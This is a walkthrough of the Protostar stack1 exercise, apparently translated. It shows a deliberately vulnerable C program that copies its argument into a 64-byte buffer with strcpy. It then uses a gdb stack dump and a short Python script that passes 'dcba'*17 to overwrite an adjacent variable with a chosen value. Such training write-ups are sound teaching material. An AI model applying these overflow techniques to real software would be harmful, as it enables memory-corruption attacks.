Introduction
In the last exercise, we modified the value of the variable modified on the stack by exploiting the stack overflow vulnerability, but we did not control what value modified was modified to. In this exercise we will try to modify modified to a specific value, which requires us to understand how variables are stored in memory.
source code
1 #include <stdlib.h> 2 #include <unistd.h> 3 #include <stdio.h> 4 #include <string.h> 5 6 int main(int argc, char **argv) 7 { 8 volatile int modified; 9 char buffer[64]; 10 11 if(argc == 1) { 12 errx(1, "please specify an argument\n"); 13 } 14 15 modified = 0; 16 strcpy(buffer, argv[1]); 17 18 if(modified == 0x61626364) { 19 printf("you have correctly got the variable to the right value\n"); 20 } else { 21 printf("Try again, you got 0x%08x\n", modified); 22 } 23 }
analyze
It can be seen that the buffer variable is not obtained through the gets function in the program, but obtained by passing in parameters when executing the program. Of course, this does not affect the payload, but some modifications need to be made when writing the exploit code, which is not considered here. this part.
It can be seen from the code that the purpose of this exercise is to change modified to 0x61626364. The layout of variables in the stack should be the same as in the exercise of stack0, but we still use gdb to output the result again, but this time to observe the variables in memory In the layout, we use "abcd" as user input:
1 $ gdb stack1 2 GNU gdb (GDB) 7.0.1-debian 3 Copyright (C) 2009 Free Software Foundation, Inc. 4 License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> 5 This is free software: you are free to change and redistribute it. 6 There is NO WARRANTY, to the extent permitted by law. Type "show copying" 7 and "show warranty" for details. 8 This GDB was configured as "i486-linux-gnu". 9 For bug reporting instructions, please see: 10 <http://www.gnu.org/software/gdb/bugs/>... 11 Reading symbols from /opt/protostar/bin/stack1...done. 12 (gdb) b 18 13 Breakpoint 1 at 0x80484a7: file stack1/stack1.c, line 18. 14 (gdb) r abcd 15 Starting program: /opt/protostar/bin/stack1 aaaa 16 17 Breakpoint 1, main (argc=2, argv=0xbffffd64) at stack1/stack1.c:18 18 18 stack1/stack1.c: No such file or directory. 19 in stack1/stack1.c 20 (gdb) print $esp 21 $1 = (void *) 0xbffffc50 22 (gdb) print $ebp 23 $2 = (void *) 0xbffffcb8 24 (gdb) x/26xw $esp 25 0xbffffc50: 0xbffffc6c 0xbffffe94 0xb7fff8f8 0xb7f0186e 26 0xbffffc60: 0xb7fd7ff4 0xb7ec6165 0xbffffc78 0x64636261 27 0xbffffc70: 0xb7fd7f00 0x080496fc 0xbffffc88 0x08048334 28 0xbffffc80: 0xb7ff1040 0x080496fc 0xbffffcb8 0x08048509 29 0xbffffc90: 0xb7fd8304 0xb7fd7ff4 0x080484f0 0xbffffcb8 30 0xbffffca0: 0xb7ec6365 0xb7ff1040 0x080484fb 0x00000000 31 0xbffffcb0: 0x080484f0 0x00000000 32 (gdb) info address modified 33 Symbol "modified" is a local variable at frame offset 92.
You can see that the input "abcd" is stored in the stack as 0x64636261, so if we want to change the modified to 0x61626364, we can set the payload to "dcba"*17
Written by EXPLOIT
This time there is no need to process user input in the middle of program execution, so the system function of the os module can be used. code show as below:
1 import os 2 payload = "dcba"*17 3 cmd = "/opt/protostar/bin/stack1 " + payload 4 os.system(cmd)
Results of the:
$ python exploit1.py
you have correctly got the variable to the right value